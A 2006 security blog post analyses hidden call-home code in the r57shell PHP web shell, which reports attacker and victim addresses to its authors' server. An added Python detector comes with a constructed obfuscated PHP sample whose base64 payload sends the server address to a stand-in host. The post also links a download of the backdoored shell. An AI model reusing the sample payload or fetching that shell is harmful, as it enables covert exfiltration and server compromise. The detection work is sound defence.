Xavier's Security Post
Tuesday, September 12, 2006
Deception within Obfuscation
A few days ago "full_disclosure full_disclosure" posted on [Full Disclosure] about the malware present in r57shell. As some of you may know, r57shell is a PHP script often used by attackers and penetration testers alike in remote and local file inclusion scenarios, for the sake of having a fully packed PHP shell interface. When using scripts like r57shell, one must always keep in mind that the authors of such tools are usually intelligent people who are capable of smuggling in obscure means of deception.

Let's look at a few ways the r57shell developers can spot your attacks, and even attack the servers you have successfully compromised, based on r57shell version 1.31:

1) Lines 1504 to 1510:

In human translation:

In essence the above doesn't look too suspicious, but be forewarned: it is quite dangerous. In exhibit 'f' your browser is instructed to load an image from the rst.void.ru web server. The variable 'img' is set to "1", which all but declares to the developers of r57shell that the incoming IP address belongs to the attacker. In other words, the developers of r57shell know who attacked what. In exhibit 'g' the server itself is instructed to read a file off the rst.void.ru web server. It does not set the variable 'img' to "1", which may indicate that the incoming server is the vulnerable box. That gives the r57shell developers the opportunity to take over the server you are attacking.

To give you an idea of the bad intentions of the code above, you have to look at exhibits 'b', 'c', and 'e', as they determine whether or not your server is worthwhile. Internal IP and loopback addresses are useless to an attacker who seems interested in a quick and easy hack. The intent of accessing the vulnerable server's IP address is clear, but what is the intent of the developers knowing your IP address? Blackmail? Accusation? Research purposes? The unknown factor is what is dangerous.

2) The original issue posted on Full Disclosure is in lines 1469 to 1487, 1593 to 1595, and 2204. I am not going to paste the contents of 1469 to 1487 as it's a big chunk of base64 code, but the following is its human translation:

Clearly the authors of r57shell have attempted, successfully, to spread malware within the form of malware itself.
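Both call-home tricks described above (a browser-loaded image that tags the operator's IP, and a server-side fetch hidden inside a base64 blob that only fires on non-private hosts) can be hunted for mechanically before a script like this is ever run. The following is an added example, not code from the post or from r57shell: it decodes base64_decode() literals in a PHP file (recursively, for layered encoding) and lists every hard-coded host contacted, tagged by whether the server or the operator's browser does the contacting. The sample PHP, the host c2.example and the payload are constructed for this example.

```python
import base64
import re

# Constructed sample in the style of an obfuscated call-home: a 1x1 image beacon
# in plain sight plus an eval'd base64 blob that fetches a URL only when the
# host is not private/loopback. Host and payload are made up; none of it is r57shell.
HIDDEN_PHP = (
    "if (!preg_match('/^(127\\.|10\\.|192\\.168\\.)/', $_SERVER['SERVER_ADDR'])) "
    "@file_get_contents('http://c2.example/r.php?ip=' . $_SERVER['SERVER_ADDR']);"
)
SAMPLE_PHP = (
    "<?php\necho '<img src=\"http://c2.example/i.gif?img=1\" width=1 height=1>';\n"
    "eval(base64_decode('" + base64.b64encode(HIDDEN_PHP.encode()).decode() + "'));\n"
)

B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)[^\s'\"<>]*")
# PHP calls that make the *server* contact a remote host (the exhibit 'g' pattern)
FETCH_FUNCS = ("file_get_contents", "fopen", "curl_init", "fsockopen", "readfile", "include")


def decode_blobs(php_src, depth=3):
    """Decode each base64_decode('...') literal, recursing into the result to unwrap layered encoding."""
    found = []
    if depth == 0:
        return found
    for m in B64_CALL.finditer(php_src):
        try:
            text = base64.b64decode(re.sub(r"\s", "", m.group(1)), validate=True).decode("utf-8", "replace")
        except ValueError:
            continue  # not valid base64 (binary or truncated blob), skip it
        found.append(text)
        found.extend(decode_blobs(text, depth - 1))
    return found


def find_callbacks(php_src):
    """List every hard-coded host contacted in plain or decoded text, tagged by who makes the request."""
    hits = []
    layers = [php_src] + decode_blobs(php_src)
    for layer in layers:
        for m in URL_RE.finditer(layer):
            start = layer.rfind("\n", 0, m.start()) + 1
            end = layer.find("\n", m.end())
            line = layer[start:end if end != -1 else None].lower()
            kind = ("server-side fetch" if any(f + "(" in line for f in FETCH_FUNCS)
                    else "browser beacon" if "<img" in line else "reference")
            hits.append({"host": m.group(1).lower(), "kind": kind, "hidden": layer is not php_src})
    return hits
```

Anything reported as "hidden" with kind "server-side fetch" is the case to worry about on the hosting box; a plain "browser beacon" only exposes whoever opens the shell in a browser.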

The backdoored code is still hosted at: http://rst.void.ru/download/r57shell.txt.gz

To their credit though, it's a great tool regardless. Just need to yank out the bad stuff :)

This public blog will be a place for me to output any Security findings, both technological and physical, that I have come across. I will post Security advisories I was a part of, and also other interesting bits of knowledge. email: xavier [at] tigerteam.se
